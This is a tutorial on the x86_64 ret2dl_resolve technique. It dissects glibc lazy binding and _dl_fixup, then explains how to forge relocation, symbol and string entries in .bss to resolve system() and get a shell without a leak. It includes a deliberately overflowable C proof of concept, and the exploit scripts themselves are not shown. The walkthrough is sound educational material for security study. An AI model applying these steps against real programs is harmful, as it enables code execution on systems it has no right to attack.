In this article, we will start analyzing the lazy binding process, we will proceed dissecting dl-runtime, understanding when it is possible to use this technique without a leak, and finally we will build our exploit.
The Lazy Binding
When a program is executed in Linux, as default behavior, the dynamic linker resolves references to symbols in the shared libraries only when it is needed. In other words, the program doesn’t know the address of a specific function in a shared library, until this function is actually utilized.
The process of resolving symbols in run-time, is known as lazy binding.
This behavior can also be modified: the dynamic linker can be forced into performing
all relocations at program startup, exporting the LD_BIND_NOW
environment variable. As we can see in ld.so man
page:
LD_BIND_NOW (since glibc 2.1.1)
If set to a nonempty string, causes the dynamic linker to
resolve all symbols at program startup instead of deferring
function call resolution to the point when they are first ref‐
erenced. This is useful when using a debugger.
Two of the most important sections involved in the lazy binding process, are respectively called Procedure Linkage Table (PLT) and Global Offset Table (GOT).
The PLT section, contains executable code and consists of well-defined format stubs. These stubs can be distinguish in a default stub and a series of function stubs. As we can see from the objdump output, we have a default stub at 0x401020 followed by a function stub (read() in this case) at 0x401030.
objdump -d poc -j .plt -M intel
Disassembly of section .plt:
0000000000401020 <.plt>:
401020: ff 35 e2 2f 00 00 push QWORD PTR [rip+0x2fe2] # 404008 <_GLOBAL_OFFSET_TABLE_+0x8>
401026: ff 25 e4 2f 00 00 jmp QWORD PTR [rip+0x2fe4] # 404010 <_GLOBAL_OFFSET_TABLE_+0x10>
40102c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
0000000000401030 <read@plt>:
401030: ff 25 e2 2f 00 00 jmp QWORD PTR [rip+0x2fe2] # 404018 <read@GLIBC_2.2.5>
401036: 68 00 00 00 00 push 0x0
40103b: e9 e0 ff ff ff jmp 401020 <.plt>
The GOT is a data section and it is populated in run-time with the addresses of resolved symbols. It also contains important addresses that will be used in the symbols resolution process: the link_map structure address and the _dl_runtime_resolve address, which we will cover shortly.
objdump -d poc -j .got.plt -M intel -z
Disassembly of section .got.plt:
0000000000404000 <_GLOBAL_OFFSET_TABLE_>:
404000: 20 3e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 >@.............
404010: 00 00 00 00 00 00 00 00 36 10 40 00 00 00 00 00 ........6.@.....
Let’s see what happens when read() is called:
-
From the .text section, instead of calling read directly, there is a call to the corresponding function stub in the .plt section (0x401030).
-
From here, there is an indirect jump to the .got.plt section (0x404018). Since the symbol has not been resolved yet, this address contains the address of the next instruction in the function stub (0x401036).
-
At this point, the execution flow is redirected to the next instruction in the function stub. Here,
reloc_arg
is pushed on the stack. -
The last instruction in the function stub is an indirect jump to the default stub (0x401020). Here the
link_map
address is pushed on the stack and finally the control is transfered to_dl_runtime_resolve()
.
We will talk about reloc_arg
and link_map
in the next section.
_dl_runtime_resolve()
is defined in
dl-trampoline.S and its definition is followed by the inclusion of
dl-trampoline.h.
Using gdb, we can immediately understand what it does:
0x7ffff7fe93c0 <_dl_runtime_resolve_xsave>: push rbx
0x7ffff7fe93c1 <_dl_runtime_resolve_xsave+1>: mov rbx,rsp
0x7ffff7fe93c4 <_dl_runtime_resolve_xsave+4>: and rsp,0xffffffffffffffc0
0x7ffff7fe93c8 <_dl_runtime_resolve_xsave+8>: sub rsp,QWORD PTR [rip+0x13379] // 0x7ffff7ffc748 <_rtld_global_ro+232>
0x7ffff7fe93cf <_dl_runtime_resolve_xsave+15>: mov QWORD PTR [rsp],rax
0x7ffff7fe93d3 <_dl_runtime_resolve_xsave+19>: mov QWORD PTR [rsp+0x8],rcx
0x7ffff7fe93d8 <_dl_runtime_resolve_xsave+24>: mov QWORD PTR [rsp+0x10],rdx
0x7ffff7fe93dd <_dl_runtime_resolve_xsave+29>: mov QWORD PTR [rsp+0x18],rsi
0x7ffff7fe93e2 <_dl_runtime_resolve_xsave+34>: mov QWORD PTR [rsp+0x20],rdi
0x7ffff7fe93e7 <_dl_runtime_resolve_xsave+39>: mov QWORD PTR [rsp+0x28],r8
0x7ffff7fe93ec <_dl_runtime_resolve_xsave+44>: mov QWORD PTR [rsp+0x30],r9
0x7ffff7fe93f1 <_dl_runtime_resolve_xsave+49>: mov eax,0xee
0x7ffff7fe93f6 <_dl_runtime_resolve_xsave+54>: xor edx,edx
0x7ffff7fe93f8 <_dl_runtime_resolve_xsave+56>: mov QWORD PTR [rsp+0x240],rdx
0x7ffff7fe9400 <_dl_runtime_resolve_xsave+64>: mov QWORD PTR [rsp+0x248],rdx
0x7ffff7fe9408 <_dl_runtime_resolve_xsave+72>: mov QWORD PTR [rsp+0x250],rdx
0x7ffff7fe9410 <_dl_runtime_resolve_xsave+80>: mov QWORD PTR [rsp+0x258],rdx
0x7ffff7fe9418 <_dl_runtime_resolve_xsave+88>: mov QWORD PTR [rsp+0x260],rdx
0x7ffff7fe9420 <_dl_runtime_resolve_xsave+96>: mov QWORD PTR [rsp+0x268],rdx
0x7ffff7fe9428 <_dl_runtime_resolve_xsave+104>: mov QWORD PTR [rsp+0x270],rdx
0x7ffff7fe9430 <_dl_runtime_resolve_xsave+112>: mov QWORD PTR [rsp+0x278],rdx
0x7ffff7fe9438 <_dl_runtime_resolve_xsave+120>: xsave [rsp+0x40] // Save current processor state
0x7ffff7fe943d <_dl_runtime_resolve_xsave+125>: mov rsi,QWORD PTR [rbx+0x10] // reloc_arg
0x7ffff7fe9441 <_dl_runtime_resolve_xsave+129>: mov rdi,QWORD PTR [rbx+0x8] // link_map
0x7ffff7fe9445 <_dl_runtime_resolve_xsave+133>: call 0x7ffff7fe2a20 <_dl_fixup> // _dl_fixup(link_map, reloc_arg)
As we can see, it is nothing more than a trampoline to _dl_fixup()
. It
starts saving the current processor state, then moves reloc_arg
in the
RSI, link_map
in the RDI (Following the x86_64 Linux calling
conventions AMD64 ABI) and
calls _dl_fixup()
.
PS: The second instruction, moves RSP in RBX, this
way QWORD PTR [rbx+0x10]
and
QWORD PTR [rbx+0x8]
, before calling _dl_fixup()
,
point respectively to reloc_arg
and link_map
, previously pushed on the
stack.
Dissecting dl-runtime
Before starting our analysis, we need to introduce three more important sections: JMPREL (.rela.plt), DYNSYM (.dynsym) and STRTAB (.dynstr). (PS: .dynsym is the analogous to .symtab, but it contains information about dynamic linking rather than static linking. This also applies to .dynstr and .strtab)
readelf --sections ./poc | egrep "Name|.rela.plt|.dynsym|.dynstr"
[Nr] Name Type Address Offset
[ 5] .dynsym DYNSYM 0000000000400328 00000328
[ 6] .dynstr STRTAB 0000000000400388 00000388
[10] .rela.plt RELA 0000000000400420 00000420
JMPREL (.rela.plt): It contains information used by the linker to perform relocations. It is composed by 0x18-byte aligned Elf64_Rel structures.
- r_offset: It contains the location where the address of the resolved symbol will be stored (In the GOT).
- r_info: Indicates the relocation type and acts as a symbol table index. It will be used to locate the corresponding Elf64_Sym structure in the DYNSYM section.
DYNSYM (.dynsym): It contains a symbol table. It is composed by 0x18-byte aligned Elf64_Sym structures. Each structure associates a symbolic name with a piece of code elsewhere in the binary.
- st_name: It acts as a string table index. It will be used to locate the right string in the STRTAB section.
- st_info: It contains symbol’s type and binding attributes.
- st_other: It contains symbol’s visibility.
- st_shndx: It contains the relevant section header table index.
- st_value: It contains the value of the associated symbol.
- st_size: It contains the symbol’s size. If the symbol has no size or the size is unknown, it contains 0.
STRTAB (.dynstr): The strings containing the symbolic names are located here.
Now we can start our analysis. _dl_fixup is defined in dl-resolve.c as follow:
|
|
We can see at line 8, that the function accepts two arguments:
struct link_map *l, ElfW(Word) reloc_arg
These are the arguments that have been previously pushed on the stack and then moved respectively in RDI and RSI.
link_map
is an important structure that contains all sort of information
about a loaded shared object. The linker creates a linked list of
link_maps and each link_map
structure describes a shared object.
reloc_arg will be used as index to identify the corresponding
Elf64_Rel
in the JMPREL section.
At line 10, a pointer to the STRTAB section is defined:
const char *strtab = (const void *) D_PTR(l, l_info[DT_STRTAB]);
l_info
(that is located at &link_map + 0x40
and points to the dynamic
section), accepts a tag as index, in this case
DT_STRTAB,
defined as #define DT_STRTAB 5
, then is passed as
second argument to D_PTR
macro.
D_PTR
is defined as
D_PTR(map, i) ((map)->i->d_un.d_ptr + (map)->l_addr)
if the dynamic section is read only,
D_PTR(map, i) (map)->i->d_un.d_ptr
otherwise.
It is
used to find the d_ptr
value in the corresponding Elf64_Dyn
structure
in the DYNAMIC section (which acts as a sort of “road map” for the
dynamic linker).
A Elf64_Dyn structure is defined as follow:
typedef struct{
Elf64_Sxword d_tag; /* Dynamic entry type */
union
{
Elf64_Xword d_val; /* Integer value */
Elf64_Addr d_ptr; /* Address value */
} d_un;
} Elf64_Dyn;
All this results in l->l_info[5]->d_un.d_ptr
, the
STRTAB address, 0x400388
in our case.
At line 11, a pointer to a Elf64_Rel
structure is defined:
const PLTREL *const reloc = (const void *) (D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
Similarly to the previous line, l_info
and D_PTR
are used to obtain the
JMPREL section address, but here, reloc_offset is added. It corresponds to reloc_arg * sizeof(PLTREL)
, reloc_arg * 0x18
.
We can notice the total absence of upper boundaries checks. This,
later on, will allow us to perform the ret2dl_resolve
attack,
providing a large reloc_arg
to dl_fixup()
.
At line 12, a pointer to a Elf64_Sym
stucture is defined:
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
To better understand this line, we need to follow some definitions. ElfW(type) is defined as:
#define ElfW(type) _ElfW (Elf, __ELF_NATIVE_CLASS, type)
#define _ElfW(e,w,t) _ElfW_1 (e, w, _##t)
#define _ElfW_1(e,w,t) e##w##t
This means that:
ElfW(R_SYM) =
_ElfW(Elf, __ELF_NATIVE_CLASS, R_SYM) =
_ElfW_1(Elf, 64, _R_SYM) =
Elf64_R_SYM
and
ELF64_R_SYM(i)
is defined as: ELF64_R_SYM(i) ((i) >> 32)
, so we
can read the line 12 as:
const ElfW(Sym) *sym = &symtab[reloc->r_info >> 32];
Basically it is using reloc->r_info >> 32
as index,
to find the corresponding Elf64_Sym
structure in the SYMTAB section.
At line 14, we have:
void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
rel_addr is a pointer to the location where the resolved symbol will be stored (in the GOT).
At line 20, there’s an important check:
assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
Elf64_R_TYPE
is defined as ELF64_R_TYPE(i) ((i) & 0xffffffff)
and
ELF_MACHINE_JMP_SLOT
is defined as
R_X86_64_JUMP_SLOT
that is equal to 7.
So line 20 is nothing more than:
assert ((reloc->r_info & 0xffffffff) == 0x7);
Basically it is checking if reloc->r_info
is a valid JUMP_SLOT.
At line 24, there’s another check:
if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)
ELF64_ST_VISIBILITY
corresponds to
ELF32_ST_VISIBILITY(o) ((o) & 0x03)
, so line 24 is equal to:
if (__builtin_expect ((sym->st_other & 0x03), 0) == 0)
If the check is not satisfied, the symbol is considered already resolved, otherwise the code inside the “if” statement is executed. It starts with a symbol versioning check at line 28:
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
VERSYMIDX is defined as:
#define VERSYMIDX(sym) (DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGIDX(sym))
DT_VERSYM, DT_NUM, DT_THISPROCNUM, DT_VERNEEDNUM and DT_VERSIONTAGIDX correspond to:
#define DT_VERSYM 0x6ffffff0
#define DT_NUM 35 /* Number used */
#define DT_THISPROCNUM 0
#define DT_VERNEEDNUM 0x6fffffff /* Number of needed versions */
#define DT_VERSIONTAGIDX(tag) (DT_VERNEEDNUM - (tag)) /* Reverse order! */
So VERSYMIDX(DT_VERSYM)
is equal to:
VERSYMIDX(0x6ffffff0) =
(DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGIDX(0x6ffffff0)) =
(35 + 0 + DT_VERSIONTAGIDX(0x6ffffff0)) =
(35 + (0x6fffffff - 0x6ffffff0)) =
(35 + 0xf) = 0x32
Consequently we have:
&l (link_map address) + 0x40 (l_info off) + VERSYMIDX(0x6ffffff0) * 0x8 (address size) =
&l + 0x40 + 0x32 * 0x8 =
&l + 0x1d0
Therefore, if (&l + 0x1d0) != NULL
, and usually it is,
for example in our case:
0x7ffff7fe2a81 <_dl_fixup+97>: mov r8,QWORD PTR [r10+0x1d0]
0x7ffff7fe2a88 <_dl_fixup+104>: test r8,r8
where R10 contains the link_map
address and
QWORD PTR [r10+0x1d0]
, moved in in R8, corresponds
to the address of the VERSYM tag in the DYNAMIC section:
R8 0x403f80 (_DYNAMIC+352) <-- 0x6ffffff0
the code in the “if” statement is executed:
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
It obtains the VERSYM address using the usual l_info
and D_PTR
macro,
then calculates “ndx” using reloc->r_info >> 32
as
index in the VERSYM section. “ndx” is subsequently used as index in
l_versions
(that is located at &link_map + 0x2e8
and is an array with version
names), to obtain the version name.
Mind this point, we will analyze it in gdb in the next section.
Finally, at line 48, _dl_lookup_symbol_x() is called, followed by DL_FIXUP_MAKE_VALUE at line 62 and elf_machine_fixup_plt() at line 82:
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
version, ELF_RTYPE_CLASS_PLT, flags, NULL);
_dl_lookup_symbol_x()
looks for loaded objects’ symbol table for a
definition of the symbol in strtab + sym->st_name
.
It returns the address of the linkmap structure, and
l_addr,
the first element in the structure, points to the libc base address.
value = DL_FIXUP_MAKE_VALUE (result, SYMBOL_ADDRESS (result, sym, false));
[...]
return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
DL_FIXUP_MAKE_VALUE
seeks the offset of the function in the library,
relocates it and stores the result in the value
variable. To do this, it uses the
SYMBOL_ADDRESS
macro, defined as:
#define SYMBOL_ADDRESS(map, ref, map_set) \
((ref) == NULL ? 0 \
: (__glibc_unlikely ((ref)->st_shndx == SHN_ABS) ? 0 \
: LOOKUP_VALUE_ADDRESS (map, map_set)) + (ref)->st_value)
Where LOOKUP_VALUE_ADDRESS corresponds to:
#define LOOKUP_VALUE_ADDRESS(map, set) ((set) || (map) ? (map)->l_addr : 0)
If everything goes well, it will result in:
value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
We can see it in gdb, a couple of instructions after the
_dl_lookup_symbol_x()
call:
0x7ffff7fe2b1c <_dl_fixup+252> mov rax, QWORD PTR [r8]
0x7ffff7fe2b1f <_dl_fixup+255> add rax, QWORD PTR [rdx + 8]
In the first instruction, the r8 contains the link_map
address, and
l_addr
is pointing to the libc base address:
R8 0x7ffff7fae000 --> 0x7ffff7deb000 <-- 0x3010102464c457f
In the second instruction, the rdx is pointing to the location of the
corresponding Elf64_Sym
structure in libc, found using
_dl_lookup_symbol_x()
:
RDX 0x7ffff7df7cd0 <-- 0xe001200002049
So it moves the libc base address in rax, and then adds to it the value
pointed by rdx + 0x8.
$rdx + 0x8 = 0x7ffff7df7cd0 + 0x8 = 0x7ffff7df7cd8
and corresponds to the location of the st_value field in the
Elf64_Sym
structure:
0x7ffff7df7cd8: 0x00000000000ee550
So we have:
rax + QWORD PTR [rdx + 8] = libc base address + st_value = 0x7ffff7deb000 + 0xee550 = 0x7ffff7ed9550
,
the location of the read() function in libc!
Now that the relocation is complete, elf_machine_fixup_plt()
writes the
address of the resolved symbol in the location pointed by rel_addr
(In
the GOT).
Let’s do a quick recap:
-
_dl_fixup(link_map, reloc_arg)
is called. -
const PLTREL *const reloc = (const void *) (JMPREL + reloc_offset);
_dl_fixup()
, based on the value ofreloc_offset (reloc_arg * 0x18)
, looks for the correspondingElf64_Rel
structure in .rela.plt. -
const ElfW(Sym) *sym = &symtab[reloc->r_info >> 32];
It uses the
reloc->r_info >> 32
field inElf64_Rel
struct, as an index to find the correspondingElf64_Sym
structure in the SYMTAB section. -
assert ((reloc->r_info & 0xffffffff) == 0x7);
Using
r_info
in theElf64_Rel
structure, it ensures it is a valid JUMP_SLOT. -
if (__builtin_expect ((sym->st_other & 0x03), 0) == 0)
Using
st_other
in theElf64_Sym
structure, it ensures the symbol is not already resolved.(sym->st_other & 3) != 0
means “symbol already resolved”, so we needst_other
== 0. -
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
It performs a symbol versioning check. Usually, this check is satisfied, so it computes “ndx” with
ElfW(Half) ndx = vernum[reloc->r_info >> 32] & 0x7fff;
and then obtains the version number withversion = &l->l_versions[ndx];
. -
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope, version, ELF_RTYPE_CLASS_PLT, flags, NULL);
_dl_lookup_symbol_x()
, looks for loaded objects’ symbol tables for a definition of the symbol instrtab + sym->st_name
and returns thelink_map
address.l_addr
points to the libc base address. -
value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
DL_FIXUP_MAKE_VALUE()
finds the offset of the function from the library base address and relocates it. -
return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
elf_machine_fixup_plt()
writes the address of the resolved symbol in the location pointed byrel_addr
(In the GOT).
Headache aside, we can move on to the exploitation part.
The Exploit
Now that we know how dl-runtime.c works, write an exploit is relativey easy. We can:
-
Push a large fake
reloc_arg
on the stack and then jump on the plt default stub._dl_fixup()
will be called withlink_map
and the fakereloc_arg
as aguments. This way we can makeconst PLTREL *const reloc = (const void *) (D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
point to a controllable area (bss/heap). -
In the fake JMPREL section, we create a fake
Elf64_Rel
structure with a large faker_info
field. Now we can makeconst ElfW(Sym) *sym = &symtab[reloc->r_info >> 32]
point to the controllable area too. -
Creating the fake
r_info
field, we need to make sure that it ends with 0x7, so the valid jump slot check,assert ((reloc->r_info & 0xffffffff) == 0x7);
, is satisfied. -
In the fake DYNSYM section, we create a fake
Elf64_Sym
structure with a fakest_other
field set to 0x00. This way theif (__builtin_expect ((sym->st_other & 0x03), 0) == 0)
check is satisfied. -
In the same
Elf64_Sym
structure we create a large fakest_name
field. This way we can makestrtab + sym->st_name
point to the controllable area. -
Finally, in the fake STRTAB section, we write a null terminated string, for example
system\x00
. If we did the math correctly,dl_fixup()
will resolve the symbol and we will get a shell!
A problem with the x64 architecture arises from:
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
{
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
}
Let’s assume that the .bss, is mapped at 0x601000, and we decide to use 0x601a00 as starting address of our controllable area.
When we fake the
JMPREL section in this area, we need to compute the r_info
field in the
corresponding fake Elf64_Rel
structure. r_info
is equal to the
distance between our fake .dynsym section and the real SYMTAB, divided
by 0x18 (since it will be used as index to identify the corresponding
Elf64_Sym
structure and the size of each structure is 0x18 bytes):
(((fake_dynsym - SYMTAB) / 0x18) << 32) | 0x7
, in
our case
(((0x601a68 - 0x4002b8) / 0x18) << 32) | 0x7 = 0x1565200000007
.
The line
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
will result in
ElfW(Half) ndx = vernum[0x1565200000007 >> 32] & 0x7fff;
.
The problem is that
0x1565200000007 >> 32 = 0x15652
, and it is a very
large index.
Let’s look at it in gdb:
0x7fd3f92fea8d <_dl_fixup+109>: mov rax,QWORD PTR [r8+0x8]
0x7fd3f92fea91 <_dl_fixup+113>: movzx eax,WORD PTR [rax+rcx*2]
0x7fd3f92fea95 <_dl_fixup+117>: and eax,0x7fff
QWORD PTR [r8+0x8]
is a pointer to the VERSYM
section, the RCX contains
0x1565200000007 >> 32 = 0x15652
. So
$rax + $rcx*2 = 0x400356 + 0x15652*2 = 0x42affa
.
This address points to an invalid memory region, so the binary
segfaults.
0x42affa: Cannot access memory at address 0x42affa
As we can see from
this article a
common workaround is to leak the link_map
address and write a NULL byte
at &l + 0x1d0
, this way, the
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
check, will not be satisfied and the program will avoid the code in the
“if” statement.
Another very interesting solution comes from this article, but it requires a leak too.
Now let’s assume the .bss is mapped at 0x404000 and we decide to
use 0x404700 as controllable area, the r_info
field in the
corresponding fake Elf64_Rel structure will be equal to
(((fake_dynsym - SYMTAB) / 0x18) << 32) | 0x7
in
this case
(((0x404768 - 0x400328) / 0x18) << 32) | 0x7 = 0x2d800000007
.
In
ElfW(Half) ndx = vernum[0x2d800000007 >> 32] & 0x7fff;
,
0x2d800000007 >> 32 = 0x2d8
and in:
0x7fd3f92fea8d <_dl_fixup+109>: mov rax,QWORD PTR [r8+0x8]
0x7fd3f92fea91 <_dl_fixup+113>: movzx eax,WORD PTR [rax+rcx*2]
0x7fd3f92fea95 <_dl_fixup+117>: and eax,0x7fff
$rax + $rcx*2 = 0x4003c6 + 0x2d8*2 = 0x400976
,
will result in a valid pointer:
0x400976: 0x0000000000000000
With my friend FizzBuzz101, we did some tests and we noticed that using the modern GCC versions, the bss is often mapped at 0x40XXXX, for example: gcc 7.4.0 and 8.3.0 on Debian 10, gcc 9.2.1 on Ubuntu 18.04, gcc 8.4.0 and 9.3.0 on Kali 4, and so on.
Under this condition, we can proceed without needing any workaround.
The vulnerable poc I used for this article is really simple:
#include <unistd.h>
void main(void)
{
char buff[20];
read(0, buff, 0x90);
}
Compiled using gcc 9.3.0:
gcc poc.c -o poc -no-pie
Let’s take a look to the exploit:
|
|
As pointed out by FizzBuzz101, we can also avoid to pivot in the stage 1. We can create the fake structures on the bss, call main and overflow again. Here’s his version of the exploit:
|
|